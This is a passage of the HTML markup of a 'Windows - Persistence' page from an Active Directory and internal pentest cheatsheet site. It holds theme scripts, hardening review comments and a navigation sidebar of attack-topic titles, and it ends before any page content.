<!doctype html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Active Directory and Internal Pentest Cheatsheets">
<!-- NOTE(review): no Content-Security-Policy is declared in this document (no
     http-equiv meta). If one is added, ideally as an HTTP header set by the host,
     the inline <script> and <style> blocks in this file need nonces or hashes
     before a policy without 'unsafe-inline' can be enforced. -->
<link rel="canonical" href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/">
<link rel="prev" href="../rdp-persistence/">
<link rel="next" href="../../pivoting/network-pivoting-techniques/">
<link rel="icon" href="../../../assets/images/favicon.png">
<!-- NOTE(review): discloses exact builder versions (mkdocs 1.6.1, mkdocs-material 9.5.44).
     Harmless for a public open-source site, but hardening baselines usually strip
     generator tags because they let a scanner fingerprint the toolchain. -->
<meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.44">
<title>Windows - Persistence - Internal All The Things</title>
<link rel="stylesheet" href="../../../assets/stylesheets/main.0253249f.min.css">
<link rel="stylesheet" href="../../../assets/stylesheets/palette.06af60db.min.css">
<style>
  /* Float the social-links widget to the right edge of its container. */
  .social-container { float: right; }
</style>
<!-- NOTE(review): fonts are pulled from Google (fonts.googleapis.com / fonts.gstatic.com),
     so every visitor's browser contacts a third-party origin on each page load (IP and
     user-agent exposure, plus a dependency outside this site's control). An SRI hash is
     not practical on the stylesheet link: the served CSS varies by user agent, so the
     hash would not be stable. If that matters for this deployment, self-host the fonts
     (mkdocs-material can be configured not to use Google Fonts, as far as I know) and
     drop the preconnect. -->
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<!-- Font-family CSS variables, presumably consumed by the theme stylesheets above. -->
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../../../custom.css">
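<script>
/* mkdocs-material bootstrap helpers used by the other inline scripts on this page.
   Storage keys are namespaced with the site root path so several sites served from
   one origin do not clobber each other's saved preferences. */

/* Site root, resolved relative to the current page (three levels up). */
__md_scope = new URL("../../..", location);

/* Simple multiplicative (x31) string hash. Non-cryptographic: it must never be
   used for anything security-relevant (integrity, identity, access decisions). */
__md_hash = e => [...e].reduce((e, _) => (e << 5) - e + _.charCodeAt(0), 0);

/* Read the JSON value stored under "<scope pathname>.<key>".
   Returns null when the key is absent OR when the stored text is not valid JSON,
   so a corrupted or tampered entry no longer throws out of the caller; the palette
   script on this page already treats a null result as "no preference".
   (A browser with storage disabled may still throw while evaluating the
   localStorage default argument; that is unchanged from before.) */
__md_get = (e, _ = localStorage, t = __md_scope) => {
  try {
    return JSON.parse(_.getItem(t.pathname + "." + e));
  } catch (err) {
    return null;
  }
};

/* Persist a JSON value under the same namespaced key. Write failures (quota
   exceeded, storage disabled in private mode) are deliberately ignored:
   preferences are best-effort. */
__md_set = (e, _, t = localStorage, a = __md_scope) => {
  try {
    t.setItem(a.pathname + "." + e, JSON.stringify(_));
  } catch (err) {}
};
</script>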
<meta property="og:type" content="website" >
<meta property="og:title" content="Windows - Persistence - Internal All The Things" >
<meta property="og:description" content="Active Directory and Internal Pentest Cheatsheets" >
<meta property="og:image" content="https://swisskyrepo.github.io/InternalAllTheThings/assets/images/social/redteam/persistence/windows-persistence.png" >
<meta property="og:image:type" content="image/png" >
<meta property="og:image:width" content="1200" >
<meta property="og:image:height" content="630" >
<meta property="og:url" content="https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/" >
<meta name="twitter:card" content="summary_large_image" >
<meta name="twitter:title" content="Windows - Persistence - Internal All The Things" >
<meta name="twitter:description" content="Active Directory and Internal Pentest Cheatsheets" >
<meta name="twitter:image" content="https://swisskyrepo.github.io/InternalAllTheThings/assets/images/social/redteam/persistence/windows-persistence.png" >
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a href="#windows-persistence" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href="../../.." title="Internal All The Things" class="md-header__button md-logo" aria-label="Internal All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Internal All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
Windows - Persistence
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
</form>
<script>
/* Apply the visitor's saved colour palette to <body>; presumably placed inline so
   the saved scheme applies before the rest of the page renders. The value is read
   back from localStorage via __md_get (same origin, written by __md_set), so it is
   only as trustworthy as any script already running on this origin; note that the
   data-md-color-* attribute names are built from its keys. A missing or unreadable
   preference yields null and is skipped. */
var palette = __md_get("__palette");
if (palette && palette.color) {
  /* "(prefers-color-scheme)" means "follow the OS setting": resolve it now by
     copying the concrete attributes from whichever palette radio (light/dark)
     matches the current media query. */
  if (palette.color.media === "(prefers-color-scheme)") {
    var media = matchMedia("(prefers-color-scheme: light)");
    var input;
    if (media.matches) {
      input = document.querySelector("[data-md-color-media='(prefers-color-scheme: light)']");
    } else {
      input = document.querySelector("[data-md-color-media='(prefers-color-scheme: dark)']");
    }
    ["media", "scheme", "primary", "accent"].forEach(function (name) {
      palette.color[name] = input.getAttribute("data-md-color-" + name);
    });
  }
  /* Mirror every stored colour property onto <body> as data-md-color-<key>. */
  for (var [key, value] of Object.entries(palette.color)) {
    document.body.setAttribute("data-md-color-" + key, value);
  }
}
</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<!-- NOTE(review): href="javascript:void(0)" is an in-page action dressed as a link;
     under a CSP without 'unsafe-inline' the javascript: navigation itself is blocked.
     The theme's share component presumably rewrites this href at runtime
     (data-clipboard-text is empty here), which would be why it is an <a> rather than
     a <button type="button">; confirm against the theme bundle before changing the
     element. -->
<a href="javascript:void(0)" class="md-search__icon md-icon" title="Share" aria-label="Share" data-clipboard data-clipboard-text="" data-md-component="search-share" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9a3 3 0 0 0-3 3 3 3 0 0 0 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.15c-.05.21-.08.43-.08.66 0 1.61 1.31 2.91 2.92 2.91s2.92-1.3 2.92-2.91A2.92 2.92 0 0 0 18 16.08"/></svg>
</a>
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
</button>
</nav>
<div class="md-search__suggest" data-md-component="search-suggest"></div>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/InternalAllTheThings" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href="../../.." title="Internal All The Things" class="md-nav__button md-logo" aria-label="Internal All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
Internal All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/InternalAllTheThings" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../.." class="md-nav__link">
<span class="md-ellipsis">
Internal All The Things
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" >
<label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
<span class="md-ellipsis">
Active directory
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_2">
<span class="md-nav__icon md-icon"></span>
Active directory
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adcs-certificate-services/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Certificate Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-acl-ace/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Access Controls ACL/ACE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-enumerate/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-group-policy-objects/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Group Policy Objects
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-groups/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Groups
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-linux/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Linux
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-machineaccountquota/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Machine Account Quota
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-ntds-dumping/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - NTDS Dumping
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adds-rodc/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Read Only Domain Controller
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-adfs-federation-services/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Federation Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-integrated-dns/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Integrated DNS - ADIDNS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-roasting-asrep/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - ASREP Roasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-roasting-kerberoasting/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - Kerberoasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-roasting-timeroasting/" class="md-nav__link">
<span class="md-ellipsis">
Roasting - Timeroasting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/ad-tricks/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory - Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/deployment-sccm/" class="md-nav__link">
<span class="md-ellipsis">
Deployment - SCCM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/deployment-wsus/" class="md-nav__link">
<span class="md-ellipsis">
Deployment - WSUS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/hash-capture/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Capture and Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/hash-over-pass-the-hash/" class="md-nav__link">
<span class="md-ellipsis">
Hash - OverPass-the-Hash
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/hash-pass-the-hash/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Pass the Hash
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/hash-pass-the-key/" class="md-nav__link">
<span class="md-ellipsis">
Hash - Pass The Key
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/internal-dcom/" class="md-nav__link">
<span class="md-ellipsis">
Internal - DCOM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/internal-mitm-relay/" class="md-nav__link">
<span class="md-ellipsis">
Internal - MITM and Relay
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/internal-pxe-boot-image/" class="md-nav__link">
<span class="md-ellipsis">
Internal - PXE Boot Image
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/internal-shares/" class="md-nav__link">
<span class="md-ellipsis">
Internal - Shares
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-bronze-bit/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Bronze Bit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-delegation-constrained/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Constrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-delegation-rbcd/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Resource Based Constrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-delegation-unconstrained/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos Delegation - Unconstrained Delegation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-s4u/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Service for User Extension
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/kerberos-tickets/" class="md-nav__link">
<span class="md-ellipsis">
Kerberos - Tickets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-comments/" class="md-nav__link">
<span class="md-ellipsis">
Password - AD User Comment
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-dsrm-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Password - DSRM Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-group-policy-preferences/" class="md-nav__link">
<span class="md-ellipsis">
Password - Group Policy Preferences
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-precreated-computer/" class="md-nav__link">
<span class="md-ellipsis">
Password - Pre-Created Computer Account
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-read-gmsa/" class="md-nav__link">
<span class="md-ellipsis">
Password - GMSA
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-read-laps/" class="md-nav__link">
<span class="md-ellipsis">
Password - LAPS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-shadow-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Password - Shadow Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/pwd-spraying/" class="md-nav__link">
<span class="md-ellipsis">
Password - Spraying
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/trust-pam/" class="md-nav__link">
<span class="md-ellipsis">
Trust - Privileged Access Management
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/trust-relationship/" class="md-nav__link">
<span class="md-ellipsis">
Trust - Relationship
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/trust-sid-hijacking/" class="md-nav__link">
<span class="md-ellipsis">
Child Domain to Forest Compromise - SID Hijacking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/trust-ticket/" class="md-nav__link">
<span class="md-ellipsis">
Forest to Forest Compromise - Trust Ticket
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2_44" >
<label class="md-nav__link" for="__nav_2_44" id="__nav_2_44_label" tabindex="0">
<span class="md-ellipsis">
CVE
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_2_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_2_44">
<span class="md-nav__icon md-icon"></span>
CVE
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../active-directory/CVE/MS14-068/" class="md-nav__link">
<span class="md-ellipsis">
MS14-068 Checksum Validation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/CVE/NoPAC/" class="md-nav__link">
<span class="md-ellipsis">
NoPAC / samAccountName Spoofing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/CVE/PrintNightmare/" class="md-nav__link">
<span class="md-ellipsis">
PrintNightmare
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/CVE/PrivExchange/" class="md-nav__link">
<span class="md-ellipsis">
PrivExchange
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../active-directory/CVE/ZeroLogon/" class="md-nav__link">
<span class="md-ellipsis">
ZeroLogon
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-ellipsis">
Cheatsheets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
Cheatsheets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../../cheatsheets/escape-breakout/" class="md-nav__link">
<span class="md-ellipsis">
Kiosk Escape and Jail Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/hash-cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/mimikatz-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/miscellaneous-tricks/" class="md-nav__link">
<span class="md-ellipsis">
Miscellaneous &amp; Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/network-discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/powershell-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/shell-bind-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/shell-reverse-cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../../cheatsheets/source-code-management-ci/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management &amp; CI/CD Compromise
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
Cloud
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
Cloud
</label>
